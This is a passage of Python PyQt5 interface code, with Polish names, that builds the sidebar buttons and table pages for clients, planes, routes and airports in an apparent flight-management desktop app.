self.lewo_gora_ramka.setMaximumSize(QtCore.QSize(16777215, 64))\n self.lewo_gora_ramka.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.lewo_gora_ramka.setFrameShadow(QtWidgets.QFrame.Raised)\n self.lewo_gora_ramka.setObjectName(\"lewo_dol_ramka\")\n self.lewo_gora_ramka.setStyleSheet(\"background-color: rgb(83, 83, 83);\")\n self.verticalLayout .addWidget(self.lewo_gora_ramka)\n self.verticalLayout_gora = QtWidgets.QVBoxLayout(self.lewo_gora_ramka)\n self.verticalLayout_gora.setContentsMargins(0,0,0,0)\n self.verticalLayout_gora.setSpacing(0)\n\n self.przycisk_wysun = QtWidgets.QPushButton(self.lewo_gora_ramka)\n self.przycisk_wysun.setMinimumSize(0,60)\n self.przycisk_wysun.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53, 53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_wysun.setIcon(QtGui.QIcon(\"modules/ikony/menu.png\"))\n self.przycisk_wysun.setIconSize(QtCore.QSize(40,40))\n self.przycisk_wysun.clicked.connect(self.animacja)\n self.verticalLayout_gora.addWidget(self.przycisk_wysun)\n #self.przycisk_wysun\n\n\n\n self.przycisk_klienci = QtWidgets.QPushButton(self.lewa_ramka)\n self.przycisk_klienci.setMinimumSize(QtCore.QSize(0, 90))\n self.przycisk_klienci.setIcon(QtGui.QIcon(\"modules/ikony/klienci.png\"))\n self.przycisk_klienci.setIconSize(QtCore.QSize(40,40))\n font = QtGui.QFont()\n font.setFamily(\"Segoe UI\")\n font.setPointSizeF(18)\n self.przycisk_klienci.setFont(font)\n self.przycisk_klienci.setStyleSheet(\"background-color: rgb(53,53,53);\")\n self.przycisk_klienci.setObjectName(\"przycisk_klienci\")\n self.verticalLayout.addWidget(self.przycisk_klienci)\n self.przycisk_klienci.clicked.connect(self.przycisk_klienci_click)\n self.przycisk_klienci.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53, 53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n\n self.przycisk_samoloty = QtWidgets.QPushButton(self.lewa_ramka)\n self.przycisk_samoloty.setMinimumSize(QtCore.QSize(0, 90))\n self.przycisk_samoloty.setIcon(QtGui.QIcon(\"modules/ikony/samolot.ico\"))\n self.przycisk_samoloty.setIconSize(QtCore.QSize(40,40))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przycisk_samoloty.setFont(font)\n self.przycisk_samoloty.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_samoloty.setObjectName(\"przycisk_samoloty\")\n self.verticalLayout.addWidget(self.przycisk_samoloty)\n self.przycisk_samoloty.clicked.connect(self.przycisk_samoloty_click)\n self.przycisk_samoloty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n #123123\n\n self.przysick_trasy = QtWidgets.QPushButton(self.lewa_ramka)\n self.przysick_trasy.setMinimumSize(QtCore.QSize(0, 90))\n self.przysick_trasy.setIcon(QtGui.QIcon(\"modules/ikony/trasa.png\"))\n self.przysick_trasy.setIconSize(QtCore.QSize(40,40))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przysick_trasy.setFont(font)\n self.przysick_trasy.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przysick_trasy.setObjectName(\"przysick_trasy\")\n self.verticalLayout.addWidget(self.przysick_trasy)\n self.przysick_trasy.clicked.connect(self.przycisk_trasy_click)\n self.przysick_trasy.setStyleSheet(\"QPushButton{\\nbackground-color: 
rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n\n\n self.przycisk_lotniska = QtWidgets.QPushButton(self.lewa_ramka)\n self.przycisk_lotniska.setMinimumSize(QtCore.QSize(0, 90))\n self.przycisk_lotniska.setIcon(QtGui.QIcon(\"modules/ikony/lotnisko.png\"))\n self.przycisk_lotniska.setIconSize(QtCore.QSize(40,40))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przycisk_lotniska.setFont(font)\n self.przycisk_lotniska.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_lotniska.setObjectName(\"przycisk_lotniska\")\n self.verticalLayout.addWidget(self.przycisk_lotniska)\n self.przycisk_lotniska.clicked.connect(self.przycisk_lotniska_click)\n self.przycisk_lotniska.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n\n\n self.przycisk_loty = QtWidgets.QPushButton(self.lewa_ramka)\n self.przycisk_loty.setMinimumSize(QtCore.QSize(0, 90))\n self.przycisk_loty.setIcon(QtGui.QIcon(\"modules/ikony/lot.png\"))\n self.przycisk_loty.setIconSize(QtCore.QSize(40,40))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przycisk_loty.setFont(font)\n self.przycisk_loty.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_loty.setObjectName(\"przycisk_loty\")\n self.verticalLayout.addWidget(self.przycisk_loty)\n self.przycisk_loty.clicked.connect(self.przycisk_loty_click)\n\n self.przycisk_loty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n\n\n\n\n self.lewo_dol_ramka = QtWidgets.QFrame(self.lewa_ramka)\n self.lewo_dol_ramka.setMaximumSize(QtCore.QSize(16777215, 60))\n self.lewo_dol_ramka.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.lewo_dol_ramka.setFrameShadow(QtWidgets.QFrame.Raised)\n self.lewo_dol_ramka.setObjectName(\"lewo_dol_ramka\")\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.lewo_dol_ramka)\n\n\n\n self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_2.setSpacing(2)\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n self.przycisk_zapis = QtWidgets.QPushButton(self.lewo_dol_ramka)\n self.przycisk_zapis.setMinimumSize(QtCore.QSize(0, 60))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przycisk_zapis.setFont(font)\n self.przycisk_zapis.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_zapis.setObjectName(\"przycisk_zapis\")\n self.przycisk_zapis.clicked.connect(self.przycisk_zapis_click)\n self.horizontalLayout_2.addWidget(self.przycisk_zapis)\n\n self.przycisk_zapis.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n self.przysick_odczyt = QtWidgets.QPushButton(self.lewo_dol_ramka)\n self.przysick_odczyt.setMinimumSize(QtCore.QSize(0, 60))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przysick_odczyt.setFont(font)\n self.przysick_odczyt.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przysick_odczyt.setObjectName(\"przysick_odczyt\")\n self.przysick_odczyt.clicked.connect(self.przycisk_odczyt_click)\n 
self.horizontalLayout_2.addWidget(self.przysick_odczyt)\n self.verticalLayout.addWidget(self.lewo_dol_ramka)\n self.horizontalLayout.addWidget(self.lewa_ramka)\n\n self.przysick_odczyt.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n\n self.prawa_ramka = QtWidgets.QFrame(self.glowny)\n self.prawa_ramka.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.prawa_ramka.setFrameShadow(QtWidgets.QFrame.Raised)\n self.prawa_ramka.setObjectName(\"prawa_ramka\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.prawa_ramka)\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_2.setSpacing(0)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n\n\n\n self.miejsce_na_stos = QtWidgets.QFrame(self.prawa_ramka)\n self.miejsce_na_stos.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.miejsce_na_stos.setFrameShadow(QtWidgets.QFrame.Raised)\n self.miejsce_na_stos.setObjectName(\"miejsce_na_stos\")\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.miejsce_na_stos)\n self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_3.setSpacing(0)\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.stos_tabel = QtWidgets.QStackedWidget(self.miejsce_na_stos)\n self.stos_tabel.setObjectName(\"stos_tabel\")\n\n # strona klienci\n\n self.strona_klienci = QtWidgets.QWidget()\n self.strona_klienci.setObjectName(\"strona_klienci\")\n self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.strona_klienci)\n self.verticalLayout_4.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_4.setSpacing(0)\n self.verticalLayout_4.setObjectName(\"verticalLayout_4\")\n self.klienci_gora = QtWidgets.QFrame(self.strona_klienci)\n self.klienci_gora.setMinimumSize(QtCore.QSize(0, 80))\n self.klienci_gora.setMaximumSize(QtCore.QSize(16777215, 80))\n self.klienci_gora.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.klienci_gora.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.klienci_gora.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.klienci_gora.setObjectName(\"klienci_gora\")\n self.verticalLayout_14 = QtWidgets.QVBoxLayout(self.klienci_gora)\n self.verticalLayout_14.setObjectName(\"verticalLayout_14\")\n self.napis_klienci = QtWidgets.QLabel(self.klienci_gora)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n font.setPointSize(40)\n self.napis_klienci.setFont(font)\n self.napis_klienci.setObjectName(\"napis_klienci\")\n self.verticalLayout_14.addWidget(self.napis_klienci)\n self.verticalLayout_4.addWidget(self.klienci_gora)\n self.klienci_tabela = QtWidgets.QFrame(self.strona_klienci)\n self.klienci_tabela.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.klienci_tabela.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.klienci_tabela.setFrameShadow(QtWidgets.QFrame.Raised)\n self.klienci_tabela.setObjectName(\"klienci_tabela\")\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.klienci_tabela)\n self.horizontalLayout_6.setObjectName(\"horizontalLayout_6\")\n self.tabela_klienci = QtWidgets.QTableWidget(self.klienci_tabela)\n self.tabela_klienci.setObjectName(\"tableWidget_5\")\n\n font.setPointSize(12)\n self.tabela_klienci.setFont(font)\n\n self.tabela_klienci.setColumnCount(3)\n self.tabela_klienci.setRowCount(1)\n item = QtWidgets.QTableWidgetItem()\n self.tabela_klienci.setVerticalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n 
self.tabela_klienci.setHorizontalHeaderItem(0, item)\n self.tabela_klienci.setColumnWidth(0,200)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_klienci.setHorizontalHeaderItem(1, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_klienci.setColumnWidth(1,200)\n self.tabela_klienci.setHorizontalHeaderItem(2, item)\n self.tabela_klienci.setColumnWidth(2,200)\n self.horizontalLayout_6.addWidget(self.tabela_klienci)\n self.verticalLayout_4.addWidget(self.klienci_tabela)\n\n\n\n self.klienci_dol = QtWidgets.QFrame(self.strona_klienci)\n self.klienci_dol.setMinimumSize(QtCore.QSize(0, 60))\n self.klienci_dol.setMaximumSize(QtCore.QSize(16777215,16777215))\n self.klienci_dol.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.klienci_dol.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.klienci_dol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.klienci_dol.setObjectName(\"klienci_dol\")\n self.horizontalLayout_5 = QtWidgets.QHBoxLayout(self.klienci_dol)\n self.horizontalLayout_5.setContentsMargins(0, 0, 10,0)\n self.horizontalLayout_5.setSpacing(10)\n self.horizontalLayout_5.setObjectName(\"horizontalLayout_5\")\n spacerItem = QtWidgets.QSpacerItem(268, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_5.addItem(spacerItem)\n\n\n\n self.przycisk_usun_klienci = QtWidgets.QPushButton(self.klienci_dol)\n self.przycisk_usun_klienci.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_usun_klienci.setMinimumSize(QtCore.QSize(120,40))\n self.przycisk_usun_klienci.setObjectName(\"przycisk_usun_klienci\")\n self.horizontalLayout_5.addWidget(self.przycisk_usun_klienci)\n self.przycisk_usun_klienci.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(222, 105, 88);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_usun_klienci.clicked.connect(self.usun_klienci)\n\n\n\n self.przycisk_dodaj_klienci = QtWidgets.QPushButton(self.klienci_dol)\n self.przycisk_dodaj_klienci.setMinimumSize(QtCore.QSize(120,40))\n self.przycisk_dodaj_klienci.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_dodaj_klienci.setObjectName(\"przycisk_dodaj_klienci\")\n self.przycisk_dodaj_klienci.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(158, 182, 83);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.horizontalLayout_5.addWidget(self.przycisk_dodaj_klienci)\n self.przycisk_dodaj_klienci.clicked.connect(self.dodaj_klienci)\n self.verticalLayout_4.addWidget(self.klienci_dol)\n self.stos_tabel.addWidget(self.strona_klienci)\n\n #Strona samoloty\n\n self.strona_samoloty = QtWidgets.QWidget()\n self.strona_samoloty.setObjectName(\"strona_samoloty\")\n self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.strona_samoloty)\n self.verticalLayout_5.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_5.setSpacing(0)\n self.verticalLayout_5.setObjectName(\"verticalLayout_5\")\n self.samoloty_gora = QtWidgets.QFrame(self.strona_samoloty)\n self.samoloty_gora.setMinimumSize(QtCore.QSize(0, 80))\n self.samoloty_gora.setMaximumSize(QtCore.QSize(16777215, 80))\n self.samoloty_gora.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.samoloty_gora.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.samoloty_gora.setFrameShadow(QtWidgets.QFrame.Sunken)\n 
self.samoloty_gora.setObjectName(\"samoloty_gora\")\n self.verticalLayout_15 = QtWidgets.QVBoxLayout(self.samoloty_gora)\n self.verticalLayout_15.setObjectName(\"verticalLayout_15\")\n self.napis_samoloty = QtWidgets.QLabel(self.samoloty_gora)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n self.napis_samoloty.setFont(font)\n self.napis_samoloty.setObjectName(\"napis_samoloty\")\n self.verticalLayout_15.addWidget(self.napis_samoloty)\n self.verticalLayout_5.addWidget(self.samoloty_gora)\n self.samoloty_tabela = QtWidgets.QFrame(self.strona_samoloty)\n self.samoloty_tabela.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.samoloty_tabela.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.samoloty_tabela.setFrameShadow(QtWidgets.QFrame.Raised)\n self.samoloty_tabela.setObjectName(\"samoloty_tabela\")\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout(self.samoloty_tabela)\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\n self.tabela_samoloty = QtWidgets.QTableWidget(self.samoloty_tabela)\n self.tabela_samoloty.setObjectName(\"tabela_samoloty\")\n font.setPointSize(12)\n self.tabela_samoloty.setFont(font)\n\n\n self.tabela_samoloty.setColumnCount(1)\n self.tabela_samoloty.setRowCount(1)\n item = QtWidgets.QTableWidgetItem()\n\n\n self.tabela_samoloty.setVerticalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_samoloty.setHorizontalHeaderItem(0, item)\n self.horizontalLayout_8.addWidget(self.tabela_samoloty)\n self.verticalLayout_5.addWidget(self.samoloty_tabela)\n self.tabela_samoloty.setColumnWidth(0,200)\n self.samoloty_dol = QtWidgets.QFrame(self.strona_samoloty)\n self.samoloty_dol.setMinimumSize(QtCore.QSize(0, 60))\n self.samoloty_dol.setMaximumSize(QtCore.QSize(16777215, 16777215))\n self.samoloty_dol.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.samoloty_dol.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.samoloty_dol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.samoloty_dol.setObjectName(\"samoloty_dol\")\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.samoloty_dol)\n self.horizontalLayout_7.setContentsMargins(0, 0, 10, 0)\n self.horizontalLayout_7.setSpacing(10)\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\n spacerItem1 = QtWidgets.QSpacerItem(268, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_7.addItem(spacerItem1)\n\n\n\n self.przycisk_usun_samoloty = QtWidgets.QPushButton(self.samoloty_dol)\n self.przycisk_usun_samoloty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(222, 105, 88);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_usun_samoloty.setObjectName(\"przycisk_usun_samoloty\")\n self.przycisk_usun_samoloty.clicked.connect(self.usun_samoloty)\n self.przycisk_usun_samoloty.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_7.addWidget(self.przycisk_usun_samoloty)\n\n\n self.przycisk_dodaj_samoloty = QtWidgets.QPushButton(self.samoloty_dol)\n self.przycisk_dodaj_samoloty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(158, 182, 83);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_dodaj_samoloty.setObjectName(\"przycisk_dodaj_samoloty\")\n self.przycisk_dodaj_samoloty.clicked.connect(self.dodaj_samoloty)\n 
self.przycisk_dodaj_samoloty.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_7.addWidget(self.przycisk_dodaj_samoloty)\n self.verticalLayout_5.addWidget(self.samoloty_dol)\n self.stos_tabel.addWidget(self.strona_samoloty)\n\n\n\n self.strona_trasy = QtWidgets.QWidget()\n self.strona_trasy.setObjectName(\"strona_trasy\")\n self.verticalLayout_13 = QtWidgets.QVBoxLayout(self.strona_trasy)\n self.verticalLayout_13.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_13.setSpacing(0)\n self.verticalLayout_13.setObjectName(\"verticalLayout_13\")\n self.trasy_gora = QtWidgets.QFrame(self.strona_trasy)\n self.trasy_gora.setMinimumSize(QtCore.QSize(0, 80))\n self.trasy_gora.setMaximumSize(QtCore.QSize(16777215, 80))\n self.trasy_gora.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.trasy_gora.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.trasy_gora.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.trasy_gora.setObjectName(\"trasy_gora\")\n self.verticalLayout_12 = QtWidgets.QVBoxLayout(self.trasy_gora)\n self.verticalLayout_12.setObjectName(\"verticalLayout_12\")\n self.napis_trasy = QtWidgets.QLabel(self.trasy_gora)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n self.napis_trasy.setFont(font)\n self.napis_trasy.setObjectName(\"napis_trasy\")\n self.verticalLayout_12.addWidget(self.napis_trasy)\n self.verticalLayout_13.addWidget(self.trasy_gora)\n self.trasy_tabela = QtWidgets.QFrame(self.strona_trasy)\n self.trasy_tabela.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.trasy_tabela.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.trasy_tabela.setFrameShadow(QtWidgets.QFrame.Raised)\n self.trasy_tabela.setObjectName(\"trasy_tabela\")\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.trasy_tabela)\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n self.tabela_trasy = QtWidgets.QTableWidget(self.trasy_tabela)\n self.tabela_trasy.setObjectName(\"tabela_trasy\")\n\n font.setPointSize(12)\n self.tabela_trasy.setFont(font)\n\n\n self.tabela_trasy.setColumnCount(4)\n self.tabela_trasy.setRowCount(1)\n item = QtWidgets.QTableWidgetItem()\n\n self.tabela_trasy.setVerticalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_trasy.setColumnWidth(0,200)\n self.tabela_trasy.setHorizontalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_trasy.setColumnWidth(1,200)\n self.tabela_trasy.setHorizontalHeaderItem(1, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_trasy.setColumnWidth(2,200)\n self.tabela_trasy.setHorizontalHeaderItem(2, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_trasy.setHorizontalHeaderItem(3, item)\n self.horizontalLayout_4.addWidget(self.tabela_trasy)\n self.verticalLayout_13.addWidget(self.trasy_tabela)\n self.trasy_dol = QtWidgets.QFrame(self.strona_trasy)\n self.trasy_dol.setMinimumSize(QtCore.QSize(0, 60))\n self.trasy_dol.setMaximumSize(QtCore.QSize(16777215, 16777215))\n self.trasy_dol.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.trasy_dol.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.trasy_dol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.trasy_dol.setObjectName(\"trasy_dol\")\n 
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.trasy_dol)\n self.horizontalLayout_3.setContentsMargins(0, 0, 10, 0)\n self.horizontalLayout_3.setSpacing(10)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n spacerItem2 = QtWidgets.QSpacerItem(268, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_3.addItem(spacerItem2)\n self.przycisk_usun = QtWidgets.QPushButton(self.trasy_dol)\n self.przycisk_usun.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(222, 105, 88);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_usun.setObjectName(\"przycisk_usun\")\n self.przycisk_usun.clicked.connect(self.usun_trasy)\n self.przycisk_usun.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_3.addWidget(self.przycisk_usun)\n self.przycisk_dodaj = QtWidgets.QPushButton(self.trasy_dol)\n self.przycisk_dodaj.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(158, 182, 83);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_dodaj.setObjectName(\"przycisk_dodaj\")\n self.przycisk_dodaj.clicked.connect(self.dodaj_trasy)\n self.przycisk_dodaj.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_3.addWidget(self.przycisk_dodaj)\n self.verticalLayout_13.addWidget(self.trasy_dol)\n self.stos_tabel.addWidget(self.strona_trasy)\n\n\n\n self.strona_lotniska = QtWidgets.QWidget()\n self.strona_lotniska.setObjectName(\"strona_lotniska\")\n self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.strona_lotniska)\n self.verticalLayout_6.setContentsMargins(0, 0,0, 0)\n self.verticalLayout_6.setSpacing(0)\n self.verticalLayout_6.setObjectName(\"verticalLayout_6\")\n self.lotniska_gora = QtWidgets.QFrame(self.strona_lotniska)\n self.lotniska_gora.setMinimumSize(QtCore.QSize(0, 80))\n self.lotniska_gora.setMaximumSize(QtCore.QSize(16777215, 80))\n self.lotniska_gora.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.lotniska_gora.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.lotniska_gora.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.lotniska_gora.setObjectName(\"lotniska_gora\")\n self.verticalLayout_16 = QtWidgets.QVBoxLayout(self.lotniska_gora)\n self.verticalLayout_16.setObjectName(\"verticalLayout_16\")\n self.napis_lotniska = QtWidgets.QLabel(self.lotniska_gora)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n self.napis_lotniska.setFont(font)\n self.napis_lotniska.setObjectName(\"napis_lotniska\")\n self.verticalLayout_16.addWidget(self.napis_lotniska)\n self.verticalLayout_6.addWidget(self.lotniska_gora)\n self.lotniska_tabela = QtWidgets.QFrame(self.strona_lotniska)\n self.lotniska_tabela.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.lotniska_tabela.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.lotniska_tabela.setFrameShadow(QtWidgets.QFrame.Raised)\n self.lotniska_tabela.setObjectName(\"lotniska_tabela\")\n self.horizontalLayout_9 = QtWidgets.QHBoxLayout(self.lotniska_tabela)\n self.horizontalLayout_9.setObjectName(\"horizontalLayout_9\")\n self.tabela_lotniska = QtWidgets.QTableWidget(self.lotniska_tabela)\n self.tabela_lotniska.setObjectName(\"tabela_lotniska\")\n\n font.setPointSize(12)\n self.tabela_lotniska.setFont(font)\n\n\n self.tabela_lotniska.setColumnCount(2)\n self.tabela_lotniska.setRowCount(11)\n item = QtWidgets.QTableWidgetItem()\n self.tabela_lotniska.setVerticalHeaderItem(0, item)\n item = 
QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_lotniska.setColumnWidth(0,200)\n self.tabela_lotniska.setHorizontalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(15)\n item.setFont(font)\n self.tabela_lotniska.setColumnWidth(1,200)\n self.tabela_lotniska.setHorizontalHeaderItem(1, item)\n self.horizontalLayout_9.addWidget(self.tabela_lotniska)\n self.verticalLayout_6.addWidget(self.lotniska_tabela)\n self.lotniska_dol = QtWidgets.QFrame(self.strona_lotniska)\n self.lotniska_dol.setMinimumSize(QtCore.QSize(0, 60))\n self.lotniska_dol.setMaximumSize(QtCore.QSize(16777215, 16777215))\n self.lotniska_dol.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.lotniska_dol.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.lotniska_dol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.lotniska_dol.setObjectName(\"lotniska_dol\")\n self.horizontalLayout_10 = QtWidgets.QHBoxLayout(self.lotniska_dol)\n self.horizontalLayout_10.setContentsMargins(0, 0, 10, 0)\n self.horizontalLayout_10.setSpacing(10)\n self.horizontalLayout_10.setObjectName(\"horizontalLayout_10\")\n spacerItem3 = QtWidgets.QSpacerItem(268, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_10.addItem(spacerItem3)\n self.przycisk_usun_lotniska = QtWidgets.QPushButton(self.lotniska_dol)\n self.przycisk_usun_lotniska.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(222, 105, 88);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_usun_lotniska.setObjectName(\"przycisk_usun_lotniska\")\n self.przycisk_usun_lotniska.clicked.connect(self.usun_lotniska)\n self.przycisk_usun_lotniska.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_10.addWidget(self.przycisk_usun_lotniska)\n\n self.przycisk_dodaj_lotniska = QtWidgets.QPushButton(self.lotniska_dol)\n self.przycisk_dodaj_lotniska.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(158, 182, 83);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n 